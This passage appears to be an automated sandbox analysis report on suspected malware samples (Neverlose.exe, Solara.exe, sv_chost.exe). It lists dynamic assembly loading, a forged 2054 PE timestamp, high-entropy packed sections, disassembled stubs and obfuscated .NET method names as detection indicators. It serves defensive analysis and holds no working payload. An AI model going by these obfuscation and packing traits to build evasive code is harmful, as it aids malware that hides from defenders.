                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS System.AppDomain.Load(byte[])
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: _8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu System.AppDomain.Load(byte[])
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS System.AppDomain.Load(byte[])
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS
                  Source: SolaraBootstrapper.exe.0.drStatic PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: Neverlose.exeStatic PE information: section name:
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01353D5C push D3AFC910h; retf 0_2_01353D61
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0135559F pushfd ; iretd 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_013559D1 push ecx; ret 0_2_013559DF
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_013555C7 pushfd ; iretd 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01355608 pushfd ; iretd 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0135569C pushfd ; iretd 0_2_0135569B
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_013538F7 push 00000048h; retf 0_2_01353916
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01356AE0 push 1ACE3110h; iretd 0_2_01356AE5
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01354EDD push ebx; iretd 0_2_01354EDE
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01024104 push ecx; mov dword ptr [esp], edx0_2_01024109
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0102819C push ecx; mov dword ptr [esp], edx0_2_0102819E
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0102432C push ecx; mov dword ptr [esp], edx0_2_01024331
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_010103EA push 01010418h; ret 0_2_01010410
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01020536 push 010205B5h; ret 0_2_010205AD
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0102654C push ecx; mov dword ptr [esp], edx0_2_0102654D
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01018556 push 010186D8h; ret 0_2_010186D0
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0100E5F0 push 0100E641h; ret 0_2_0100E639
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0102E40C push ecx; mov dword ptr [esp], edx0_2_0102E411
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01010424 push 01010450h; ret 0_2_01010448
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01024448 push ecx; mov dword ptr [esp], edx0_2_0102444D
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01022454 push 010224A1h; ret 0_2_01022499
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0101045C push 01010488h; ret 0_2_01010480
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0102448C push ecx; mov dword ptr [esp], edx0_2_01024491
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01010494 push 010104C0h; ret 0_2_010104B8
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_010104F8 push 0101052Ch; ret 0_2_01010524
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01010738 push 0101085Ch; ret 0_2_01010854
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_010186DA push 0101874Bh; ret 0_2_01018743
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0100E968 push 0100E994h; ret 0_2_0100E98C
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_01020804 push 01020830h; ret 0_2_01020828
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0101885E push 0101888Ch; ret 0_2_01018884
                  Source: C:\Users\user\Desktop\Neverlose.exeCode function: 0_2_0100E8AA push 0100E8D8h; ret 0_2_0100E8D0
                  Source: Neverlose.exeStatic PE information: section name: entropy: 7.99709234138958
                  Source: Neverlose.exeStatic PE information: section name: entropy: 7.501912508388803
                  Source: Neverlose.exeStatic PE information: section name: .data entropy: 7.984098571143187
                  Source: Solara.exe.0.dr, WUHrLuAzG76gjb420QL2petRr.csHigh entropy of concatenated method names: 'OowvofSDDc4ET7y3kHStsFVYQ', 'wUT7yhbH8yrBs28ptpZ7paLIi', 'cPuCSHrIUyinXAQpEZE4qi2uf', 'wK6BrlTVvp0PIWOzWT7N6I5TtuMEcl8kh1S', 'XWB6EcNQHnQNbT6OCzzqiip7Z8eX9YYcxFD', 'f6SWfPTavhpioocdQbXsEVHxfgQYt0NEdjz', 'IQI51zSt6w3RX352czL0GqqRyiaZ9beRTLi', '_3FSsJ68XU4xFa7TqCN2LmOvwIIiRusfNaOS', 'QqejOadNHaBM70sYr2ndJwSFJGC1Z7a4dQT', 'oqq09uWShpD1v0on0o646ceHuX2dnyKbdUZ'
                  Source: Solara.exe.0.dr, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csHigh entropy of concatenated method names: 'LBGv7RRFPn4976IF9aRFE4vMEUNxsaQ0bX1DWEDJaOUZKCUQuWk1RO2ylGq3', 'udpRpvGmAz57Y2O8rM75yPIs91RxBCk8Xb9GN7Bckx9ELsEaHfKb3FLeNqp7', 'xMaI0a85HjyijYhMhP0ctM9y6tQCq4UIJ6di5ajAt5xvLPbPAQwvBotBhSop', 'xOJfSVuUewM3wv7I67tAmY6qiJFhyVFqymavk4CN7cADRf5ACje5q4FkW0pM'
                  Source: Solara.exe.0.dr, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC', 'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h', 'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0', '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN'
                  Source: Solara.exe.0.dr, rKw0lbvJvj9v9nQmNRYVdkaAc.csHigh entropy of concatenated method names: '_3WkO9CHX5n3O0pGvwGK2GYYE1', 'MhM84cAcUC1tmKCDH3sJ7JSLJ', 'fJQ171sCTcNYAMsRUZImHvsJb', 'UlSZPzIGapH4OdhfOJKxnUCM0', 'C3ZtU5gOVvNrDnOJ4QThnfs74', 'Z7l08qNJCG6GApOyUfYdmhVki', '_0992M3o93AjFJXrFDl7bMy5rd', 'P0o9Na9XjNXWqALcTFWJeAG1V', 'fY5sVZgSamt9kyYZnDwtu45CZ', 'VvWC8Ut8u54FUjU7sAphOV0QN'
                  Source: Solara.exe.0.dr, Wj3PjIfqD1OSSp0iwZycbM1aD.csHigh entropy of concatenated method names: 'RXrXjEiYvFSIlBcduEeeE8lH9', 'PAxhwEy1krySFSbJSOQcG3gSJ', 'h98aL2t7wod8gzaBng9cdkgtH', '_9U2gA8lwegLGMUrP7KqCkKV8c', 'm4R9ZM4JZ4viyR28mfUhQU3fP', 'A8TvHfc9O4NDr5h6uXJJKzIcY', 'nHGP2MMab7ieetFHPOCzaS0lh', 'JdBvwjbLekFt843r0HegBknfw', 'mbqZYrm30q4fPFbOLgm25u4QJ', 'Q5OEHHUrArBRxsi9WguVtcyVW'
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csHigh entropy of concatenated method names: 'GxO3TdFlvoojPQarF5sHZUWQYcUQdoqTpgV2TADkl0NcyK2z7GmcJ1EGd2nRNhSmmoadBkC9YhNvhAemX9Ndm5U88NtOFEwITP', '_8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu', 'gSvqT2UygyJ8SEjhMz7WS7m4GviFjA1XZYwOVOHhvBzrbxP7uVxVztEo7dBbVRiXjBb14k7OcyjNH3V1GWNZoyFALczGvFNfWh', 'lygg1I8X9Vr3DNzZlHUWuu4Y6PRhc9lVV7knYyo2zmgOU4xvgj9MJceVz6xWblv3I4g5EbMYpmEsQofqmkXunWyryhatai6Fdv', 'YCoF4EvPrPjHQZ0HflYeaTjEsgqlACwC0h38tj5QaCfIhEklMWUvJq0IS5nOUnscQc0fKGXHPoc8h1DBGRTiTECaza65ubAEDJ', 'wRC9iO4UNSzzIHVnbM5hHNX6arORUdzwaxfB0tvq68IBKllpxL0xh5L0bnmMmbjrgXbl8gDAJwtE5GbFyFqbN0FPO375CsO4EM', 'qG32MDQ12K0GRA77JkqYtxX7Wf6hJdixIDbhktqaarUafj0WT04RKQX5XPRiRXtWFcktaSI0QJGQ322mYhJkaLC1eMgyMk5jHM', 'dPRlkea35Qb0tgllFMwACj1BznSFtzDtR56UqoK9JDthAljsFZnwkO79aDMsHR69xEGY6XKNJgXE08sC7SoWgn2zgNzVgwRTh9', 'Vbpv1QaisRwG8kMSJBQbtGSKL9CgA2BqkRlIts0WrpIHBAqa0w9zke4GGpMuPwYlS3JcO39JftJABy29gXidcex6SlO5ShynID', 'natV2pBRfwSVKnZRVRxJPMfLHM539iW0KWweYNUAmjvkmFDnnT6vX7QqdIM6rVTaHDMpeksTKcfDkfBUvxPqozyxdZIATHo0es'
                  Source: Solara.exe.0.dr, P2XOur6bqoe5LxNtDHyiL3aGh.csHigh entropy of concatenated method names: 'aJJJWPOIkTbTkss4Igvj4IkdB', 'R3CY8bj7ZA7ssA0a57qXXqY2zaw4WTCya0YoxYCbdT61szRxWvcYxbbIwW94', 'bqodObM0EtWvsA8UOldQGkJQG81RBNBuXPmGbHCcrEiiNGgTwugTyAVpgTlu', 'mMZZ9OHwXusb2dKkVAQ1jgP0av6JAL2tHls9WWek56WkeUmnDGvug2kQ0uTY', 'L93aRCzIAJy7U8XuS69Rgkgz9zS99KEIiCwZxFUvfymVhwdXkjpwYPeRs0cZ'
                  Source: Solara.exe.0.dr, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csHigh entropy of concatenated method names: 'vhyLcb9WwRxTlJ28NuxeWPj0eoKj5cZufOpv2fBjWc44RyALE2I2OQdqaJYlhndX0LbEnkiruOJ2bQvqLyr3ruQEqUvD0c6m7C', 't02xA0JZht1N9iOyAPNGa0fXGh1ru1pr2VC7SlnQtH3f9wDeVo3meILYSyQBPUe3iI4owHK3dhSfPqdqN37iNWZMJ72HGsWfXv', 'c0LqPsDD9vpIvPboJ2p5Vh8iro038VLiShiPHknWmWUdf281xfhpF5O0R1rdB1a3WUgZlStGKEdW9y1dm7erjqRg6Vdm1uXAOO', 'JUqhuH2arwD8n31kiAbg25H76i8zc3Hvg2zJKbIzkdGWcLQJDPsvan1fbFnNj62ZfHJHWKwJB1UJ8nuH6o6aSkuIFkhi3rfLVb', '_45Z3UpAryp7dJR4jHvUasCrIXOby7BdcytU33dsicQQGZkPrxbPW5hxjl4CeJfPOKh9fd8YU5zwfIRsrQEdE0zFUz5ETKJB8BW', 'uGYoX3KpGSaukuhq6MExbq3sp3emPKwCGpsHl8eT1Rjnn3jfdDFnx7fVXR7w', 'v6aaD0eafsx1Lm9zTRXenuXlPSOHP0BbmYHbUtxy1n8cs92X0VMVZ1CGgbft', 'BBMDmVpkEAPx6KlniT6v1pY597rRrIgbFPQ5DabpusmxSfzNuDhrCru5hViv', 'ozDyrJ7c8KthqWAA2IjogXVpWuVYBITckeTOIGZ25Je38Wvi28wQsSR04zZz', 'YsSKpaSercYU0RD2KNsU9fN7DsqpnqImXkxiT6K21QVFBaNcCft5zM5qKTta'
                  Source: Solara.exe.0.dr, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csHigh entropy of concatenated method names: 'PAzJ2Vuz2610vI1WuG7NojUv2f66IGmfr3y7CIyzNVWTOmPLeJ0i1ZVt373gl2wjwTxjgFJRBRazzKwe7lJXrgu2hVeXBxtHhg', 'hIVubgYXHBzKvBDW0ilVwVIt1Vvs0H2aeGoqzLiMzjW5neC3LgPbhLVA76XswcKn7mJLmiAEXvIokptm0Ek9Ufiq9WzUtxGFaU', 'hAe4tkQP421eNr7Zc4MeougE41ZHAsl1ljhPHDgAIocDCXl7fF6GE3vOH12dOwlsJ9qhNeACsGU8qgAjfZjpfFeTltZmprhlHk', 'Bf8uaoyAmqUuabzA1M9c19yH1J2QckpWPPZ3MrTre2cHTMS1q73va5tmvsBLDZfzOmDYx8xxcndB3tbuzRtKUmVUiD1F1gQI7C', 'VwkVlWGISswZyeOkrSiHbu9jO17cxX9l3shzwvLRAHAzrqhKrB3Y8smKrcGyS4OeR0jHaUGOIwVp8GGlMWTxvqPckiEPj4MTDJ', '_7EG628END1shnUJVHgqToJjFeefrJgkPKk3lcLTZ8viUSYF8f5eFRwC70J8i9C50by3SmQonZLbNaWDPu21o8eVV829cgeoZvh', 'DAPRzYyW2xpLAKpXBLhoVztCUq7U0k4YkvkQzm5jumXywN8ckqgVsNoH8eN98JHCQNcIE67Bprcd0v3lhyd1B4hypI8gZ40nPg', 'GtofFdJ4qCtavXAGBjCunL2YwMO3rMk8OpyqgJJO8BRwD9hLP5nkWO3TkBcpSSp0oKRH4HAY5wJF04QOylCX26oqBm9Z9qfAuQ', 'QaWNagj6M4ABQakOS6OTPHDPDHY4cmTHkTTUsuzR00UI8ZN7q6d6UOgSbaBPordllN3DEMmSOtXXTnWOpE1ixPril51cpmyfGe', 'Y7slcQu3AJ0VF6BzAsMpAMAhDbYkKbt2eSIANY2JBkcGEMtNFPmmlTfBetZ0E919JifefOp9Rq06xhPqH225keFAlsVMrfDijg'
                  Source: Solara.exe.0.dr, E8phRKCKw5AfpQsOlZWL2sYGK.csHigh entropy of concatenated method names: 'woNNvbBHYYayGYkYBOl894t8i', '_3s5PwmBfKfiBCNOBQXr0grICf4uPFzQHgqdzkNyJBjrIBUyGowcEc52SRFc2zzv4zcjKlakgQDICleDyrlrOhYZs0Jdi4', 'LSyWMQAAazaffZiZKajqA1c9rwn5yD9bDrDB8PR1H2yF5HG4F19i1ZNieIEf90ddo6SEUBQAwvknoODglzpPnX6Z9SSES', 'F3aZ3ypQuDq48GzTIxVHe8vxnCLJ8vBqTPQDQygY1wjSeZlTLh3Oh9qS6YwnliV08FqlfIXvcpqXSrV1npLppBO7g4X2x', '_0WmFIssJVQqfaVIKIPw5SIJKWfhVdrSCNmeCyu7PcrBNHimyjP0ENQZyqeXcn7tgmq2RD0QZOmYwdmyCYH7eKMOV5ILUg'
                  Source: Solara.exe.0.dr, 0RhgANw5PGWmGKZ15e5NJiNQS.csHigh entropy of concatenated method names: 'rYVj5gN0TIrof0Ma56WAroWQX', '_3pY46X5nz8CyVBKd1fbfZimFh', 'B2sZNRjBHELj1BmXrJVBlwNh7', 'qJ5EUBuUhc6rQE3MB3cSPjITV', '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY', 'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI', 'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8', 'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs', 'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG', 'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, WUHrLuAzG76gjb420QL2petRr.csHigh entropy of concatenated method names: 'OowvofSDDc4ET7y3kHStsFVYQ', 'wUT7yhbH8yrBs28ptpZ7paLIi', 'cPuCSHrIUyinXAQpEZE4qi2uf', 'wK6BrlTVvp0PIWOzWT7N6I5TtuMEcl8kh1S', 'XWB6EcNQHnQNbT6OCzzqiip7Z8eX9YYcxFD', 'f6SWfPTavhpioocdQbXsEVHxfgQYt0NEdjz', 'IQI51zSt6w3RX352czL0GqqRyiaZ9beRTLi', '_3FSsJ68XU4xFa7TqCN2LmOvwIIiRusfNaOS', 'QqejOadNHaBM70sYr2ndJwSFJGC1Z7a4dQT', 'oqq09uWShpD1v0on0o646ceHuX2dnyKbdUZ'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.csHigh entropy of concatenated method names: 'LBGv7RRFPn4976IF9aRFE4vMEUNxsaQ0bX1DWEDJaOUZKCUQuWk1RO2ylGq3', 'udpRpvGmAz57Y2O8rM75yPIs91RxBCk8Xb9GN7Bckx9ELsEaHfKb3FLeNqp7', 'xMaI0a85HjyijYhMhP0ctM9y6tQCq4UIJ6di5ajAt5xvLPbPAQwvBotBhSop', 'xOJfSVuUewM3wv7I67tAmY6qiJFhyVFqymavk4CN7cADRf5ACje5q4FkW0pM'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC', 'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h', 'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0', '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, rKw0lbvJvj9v9nQmNRYVdkaAc.csHigh entropy of concatenated method names: '_3WkO9CHX5n3O0pGvwGK2GYYE1', 'MhM84cAcUC1tmKCDH3sJ7JSLJ', 'fJQ171sCTcNYAMsRUZImHvsJb', 'UlSZPzIGapH4OdhfOJKxnUCM0', 'C3ZtU5gOVvNrDnOJ4QThnfs74', 'Z7l08qNJCG6GApOyUfYdmhVki', '_0992M3o93AjFJXrFDl7bMy5rd', 'P0o9Na9XjNXWqALcTFWJeAG1V', 'fY5sVZgSamt9kyYZnDwtu45CZ', 'VvWC8Ut8u54FUjU7sAphOV0QN'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Wj3PjIfqD1OSSp0iwZycbM1aD.csHigh entropy of concatenated method names: 'RXrXjEiYvFSIlBcduEeeE8lH9', 'PAxhwEy1krySFSbJSOQcG3gSJ', 'h98aL2t7wod8gzaBng9cdkgtH', '_9U2gA8lwegLGMUrP7KqCkKV8c', 'm4R9ZM4JZ4viyR28mfUhQU3fP', 'A8TvHfc9O4NDr5h6uXJJKzIcY', 'nHGP2MMab7ieetFHPOCzaS0lh', 'JdBvwjbLekFt843r0HegBknfw', 'mbqZYrm30q4fPFbOLgm25u4QJ', 'Q5OEHHUrArBRxsi9WguVtcyVW'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.csHigh entropy of concatenated method names: 'GxO3TdFlvoojPQarF5sHZUWQYcUQdoqTpgV2TADkl0NcyK2z7GmcJ1EGd2nRNhSmmoadBkC9YhNvhAemX9Ndm5U88NtOFEwITP', '_8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu', 'gSvqT2UygyJ8SEjhMz7WS7m4GviFjA1XZYwOVOHhvBzrbxP7uVxVztEo7dBbVRiXjBb14k7OcyjNH3V1GWNZoyFALczGvFNfWh', 'lygg1I8X9Vr3DNzZlHUWuu4Y6PRhc9lVV7knYyo2zmgOU4xvgj9MJceVz6xWblv3I4g5EbMYpmEsQofqmkXunWyryhatai6Fdv', 'YCoF4EvPrPjHQZ0HflYeaTjEsgqlACwC0h38tj5QaCfIhEklMWUvJq0IS5nOUnscQc0fKGXHPoc8h1DBGRTiTECaza65ubAEDJ', 'wRC9iO4UNSzzIHVnbM5hHNX6arORUdzwaxfB0tvq68IBKllpxL0xh5L0bnmMmbjrgXbl8gDAJwtE5GbFyFqbN0FPO375CsO4EM', 'qG32MDQ12K0GRA77JkqYtxX7Wf6hJdixIDbhktqaarUafj0WT04RKQX5XPRiRXtWFcktaSI0QJGQ322mYhJkaLC1eMgyMk5jHM', 'dPRlkea35Qb0tgllFMwACj1BznSFtzDtR56UqoK9JDthAljsFZnwkO79aDMsHR69xEGY6XKNJgXE08sC7SoWgn2zgNzVgwRTh9', 'Vbpv1QaisRwG8kMSJBQbtGSKL9CgA2BqkRlIts0WrpIHBAqa0w9zke4GGpMuPwYlS3JcO39JftJABy29gXidcex6SlO5ShynID', 'natV2pBRfwSVKnZRVRxJPMfLHM539iW0KWweYNUAmjvkmFDnnT6vX7QqdIM6rVTaHDMpeksTKcfDkfBUvxPqozyxdZIATHo0es'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, P2XOur6bqoe5LxNtDHyiL3aGh.csHigh entropy of concatenated method names: 'aJJJWPOIkTbTkss4Igvj4IkdB', 'R3CY8bj7ZA7ssA0a57qXXqY2zaw4WTCya0YoxYCbdT61szRxWvcYxbbIwW94', 'bqodObM0EtWvsA8UOldQGkJQG81RBNBuXPmGbHCcrEiiNGgTwugTyAVpgTlu', 'mMZZ9OHwXusb2dKkVAQ1jgP0av6JAL2tHls9WWek56WkeUmnDGvug2kQ0uTY', 'L93aRCzIAJy7U8XuS69Rgkgz9zS99KEIiCwZxFUvfymVhwdXkjpwYPeRs0cZ'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, 9anJqYyVCjcrXTuH1GzopYW8wzyY78Cd40FBQZs2D00E8Ibmuz0NNIGaS8nPFW6rEQFzkcsRuNbLEld04TJOzbVcsq03WRbNSG.csHigh entropy of concatenated method names: 'vhyLcb9WwRxTlJ28NuxeWPj0eoKj5cZufOpv2fBjWc44RyALE2I2OQdqaJYlhndX0LbEnkiruOJ2bQvqLyr3ruQEqUvD0c6m7C', 't02xA0JZht1N9iOyAPNGa0fXGh1ru1pr2VC7SlnQtH3f9wDeVo3meILYSyQBPUe3iI4owHK3dhSfPqdqN37iNWZMJ72HGsWfXv', 'c0LqPsDD9vpIvPboJ2p5Vh8iro038VLiShiPHknWmWUdf281xfhpF5O0R1rdB1a3WUgZlStGKEdW9y1dm7erjqRg6Vdm1uXAOO', 'JUqhuH2arwD8n31kiAbg25H76i8zc3Hvg2zJKbIzkdGWcLQJDPsvan1fbFnNj62ZfHJHWKwJB1UJ8nuH6o6aSkuIFkhi3rfLVb', '_45Z3UpAryp7dJR4jHvUasCrIXOby7BdcytU33dsicQQGZkPrxbPW5hxjl4CeJfPOKh9fd8YU5zwfIRsrQEdE0zFUz5ETKJB8BW', 'uGYoX3KpGSaukuhq6MExbq3sp3emPKwCGpsHl8eT1Rjnn3jfdDFnx7fVXR7w', 'v6aaD0eafsx1Lm9zTRXenuXlPSOHP0BbmYHbUtxy1n8cs92X0VMVZ1CGgbft', 'BBMDmVpkEAPx6KlniT6v1pY597rRrIgbFPQ5DabpusmxSfzNuDhrCru5hViv', 'ozDyrJ7c8KthqWAA2IjogXVpWuVYBITckeTOIGZ25Je38Wvi28wQsSR04zZz', 'YsSKpaSercYU0RD2KNsU9fN7DsqpnqImXkxiT6K21QVFBaNcCft5zM5qKTta'
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, vQAPrP9GTLqDP2TnxJeVqWDPZUl80OjDPKWiB9VD1kMfb5r21UVMVWfhd592gHEG8uqxz64WQlAbmJteBo6yNqI0GEgj98oDxc.csHigh entropy of concatenated method names: 'PAzJ2Vuz2610vI1WuG7NojUv2f66IGmfr3y7CIyzNVWTOmPLeJ0i1ZVt373gl2wjwTxjgFJRBRazzKwe7lJXrgu2hVeXBxtHhg', 'hIVubgYXHBzKvBDW0ilVwVIt1Vvs0H2aeGoqzLiMzjW5neC3LgPbhLVA76XswcKn7mJLmiAEXvIokptm0Ek9Ufiq9WzUtxGFaU', 'hAe4tkQP421eNr7Zc4MeougE41ZHAsl1ljhPHDgAIocDCXl7fF6GE3vOH12dOwlsJ9qhNeACsGU8qgAjfZjpfFeTltZmprhlHk', 'Bf8uaoyAmqUuabzA1M9c19yH1J2QckpWPPZ3MrTre2cHTMS1q73va5tmvsBLDZfzOmDYx8xxcndB3tbuzRtKUmVUiD1F1gQI7C', 'VwkVlWGISswZyeOkrSiHbu9jO17cxX9l3shzwvLRAHAzrqhKrB3Y8smKrcGyS4OeR0jHaUGOIwVp8GGlMWTxvqPckiEPj4MTDJ', '_7EG628END1shnUJVHgqToJjFeefrJgkPKk3lcLTZ8viUSYF8f5eFRwC70J8i9C50by3SmQonZLbNaWDPu21o8eVV829cgeoZvh', 'DAPRzYyW2xpLAKpXBLhoVztCUq7U0k4YkvkQzm5jumXywN8ckqgVsNoH8eN98JHCQNcIE67Bprcd0v3lhyd1B4hypI8gZ40nPg', 'GtofFdJ4qCtavXAGBjCunL2YwMO3rMk8OpyqgJJO8BRwD9hLP5nkWO3TkBcpSSp0oKRH4HAY5wJF04QOylCX26oqBm9Z9qfAuQ', 'QaWNagj6M4ABQakOS6OTPHDPDHY4cmTHkTTUsuzR00UI8ZN7q6d6UOgSbaBPordllN3DEMmSOtXXTnWOpE1ixPril51cpmyfGe', 'Y7slcQu3AJ0VF6BzAsMpAMAhDbYkKbt2eSIANY2JBkcGEMtNFPmmlTfBetZ0E919JifefOp9Rq06xhPqH225keFAlsVMrfDijg'
